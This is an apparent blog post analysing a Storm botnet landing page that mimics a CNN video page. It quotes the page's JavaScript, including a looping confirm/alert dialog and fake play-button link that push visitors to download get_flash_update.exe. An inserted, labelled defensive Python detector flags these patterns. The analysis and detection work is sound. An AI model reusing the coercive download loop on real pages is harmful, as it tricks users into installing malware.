Storm botnet landing page - Faux-CNN splash screen

The Storm botnet spammed this page starting on 2008-08-05, and I currently show 103 different hijacked servers serving it. It's an emulation of a CNN video page, which makes sense given that the spam pointing to it is entitled "CNN.com Top 10" and is made to look like a CNN update.

It uses a number of different techniques to attempt to run the file "get_flash_update.exe" on the user's machine, but makes no particular attempt to conceal its actions, which is disappointing if, like me, you're a fan of JavaScript trickiness.

It was succeeded on August 7 by an obfuscated version.

You can see the whole page here. Here are some of the highlights.

First, the entire point of this page is to load "get_flash_update.exe", either by getting the browser to do so automatically (say, by refreshing the page to that URL), or by fooling the user into clicking something telling the browser to do so.

For instance, there's this little Javascript beauty:

function vc() {
   if (confirm('Video ActiveX Object Error.\n\n
               Your browser cannot play this video file.\n
               Click \'OK\' to download and install missing
               Video ActiveX Object.')) {
      location.href="get_flash_update.exe";
   } else {
      if (alert('Please install new version of Video ActiveX Object.')) {
         vc();
      } else {
         vc();
      }
   }
}

When called, this function pops up a box telling you that you can't play this fascinating CNN news video without updating something. The vast majority of users will simply say, "OK," and click. If they do, the "location.href" is changed to load "get_flash_update.exe". But if they feel suspicious and don't, another popup box appears, asking them flat-out to install the change. No matter what they click on that, they're taken back to the start.

Once this function is called, the only way to break out of the loop is to click "OK", or kill the browser with Task Manager or by turning off the machine. Javascript can be kind of insistent that way.

And this function is called all over the place: it's the main feature of the Close() function, which is the onClick handler for everything on the popdiv popup-window emulator; it's installed on a timeout for the whole page; and it's called by the Down() function if the user just hits the Escape key on the popup.

But if that function somehow manages to avoid getting called (perhaps Javascript is simply disabled?), the page still links get_flash_update.exe directly from a button-like image. We're all quite well trained to click play-button images on YouTube, so again: most users will simply click that button without even pausing.

Oh, I mentioned a popup window. This is kind of cool; I don't really do a lot of Javascript programming, but it's this kind of thing that makes me consider doing more of it. The "popdiv" div is originally hidden when the page loads. A timer is set to display it after 2 seconds, and everything on it calls vc(). Devious!
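Looking at the same tricks from the defender's side, here is an added example (not code from the original post or from the Storm page) that flags these patterns in a saved copy of a landing page with plain regex heuristics: the .exe navigation, the confirm() gate, the timer that reveals the hidden div, the fake play button, and any function that shows a dialog and calls itself. The page text it scans is a constructed sample modelled on the snippets above, not the real page source.

```python
import re

# Constructed sample modelled on the techniques described above; not the actual Storm page source.
SAMPLE_PAGE = r"""<html><body><script>
function vc() {
   if (confirm('Video ActiveX Object Error. Click OK to install.')) {
      location.href="get_flash_update.exe";
   } else { alert('Please install new version of Video ActiveX Object.'); vc(); }
}
function show_popdiv() { document.getElementById('popdiv').style.display = 'block'; }
setTimeout("show_popdiv()", 2000);
</script>
<div id="popdiv" style="display:none" onclick="vc()">fake dialog</div>
<a href="get_flash_update.exe"><img src="play.gif"></a>
</body></html>"""

# Regex heuristics over the raw page text, one per technique the post walks through.
INDICATORS = {
    # navigation assignment pointing straight at an executable
    "exe_navigation": re.compile(r"location(?:\.href)?\s*=\s*['\"][^'\"]*\.exe['\"]", re.I),
    # confirm() dialog whose OK branch performs that navigation
    "confirm_gate": re.compile(r"if\s*\(\s*confirm\s*\([^)]*\)\s*\)\s*\{[^}]*location", re.I),
    # hidden element revealed by a timer of a second or more
    "delayed_reveal": re.compile(r"setTimeout\s*\([^;]*?\d{3,}\s*\)", re.I),
    # <a> to an .exe wrapping an image (the fake play button)
    "exe_image_link": re.compile(r"<a\s[^>]*href\s*=\s*['\"][^'\"]*\.exe['\"][^>]*>\s*<img", re.I),
}

def function_bodies(page):
    """Yield (name, body) per JS function by brace matching; braces inside strings will confuse it."""
    for m in re.finditer(r"function\s+(\w+)\s*\([^)]*\)\s*\{", page):
        depth, i = 1, m.end()
        while i < len(page) and depth:
            depth += {"{": 1, "}": -1}.get(page[i], 0)
            i += 1
        yield m.group(1), page[m.end():i - 1]

def recursive_prompt_loops(page):
    """Names of functions that show a dialog and call themselves: the user cannot escape."""
    return [name for name, body in function_bodies(page)
            if re.search(r"\b(?:alert|confirm)\s*\(", body)
            and re.search(r"\b%s\s*\(" % re.escape(name), body)]

def find_indicators(page):
    """Return {indicator: evidence} for every heuristic that fires on the page."""
    found = {name: m.group(0) for name, rx in INDICATORS.items() if (m := rx.search(page))}
    loops = recursive_prompt_loops(page)
    if loops:
        found["recursive_prompt_loop"] = loops
    return found
```

Run it as `find_indicators(open("saved_page.html").read())`; a clean page returns an empty dict, while the sample above trips all five heuristics.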

The popup window itself can be dragged around the screen, with the Drag object. The source for that can be found here (yes, they're using it without attribution), dating to 2001. I find it fascinating how well the lineage of these blocks can be traced.

Which brings me to this, speaking of lineage:

function activex_is_here()
{
    try
    {
        return false;
    }
    catch(e)
    {
        ;
    }

    return false;
}

Isn't that odd? It does precisely nothing, always returning false. That's because it's a fossil -- it's a disabled version of a working function used last week. Googling "function activex_is_here()" gets some interesting results, which I discuss here.

Incidentally, the same Google session netted me a nice analysis of this page dated in April of this year, well before the Storm spam storm starting in June. Interesting. I can't understand the analysis very well, because my Polish is really weak, but the code is quite similar.

Copyright © 1996-2009 Vivtek. All Rights Reserved.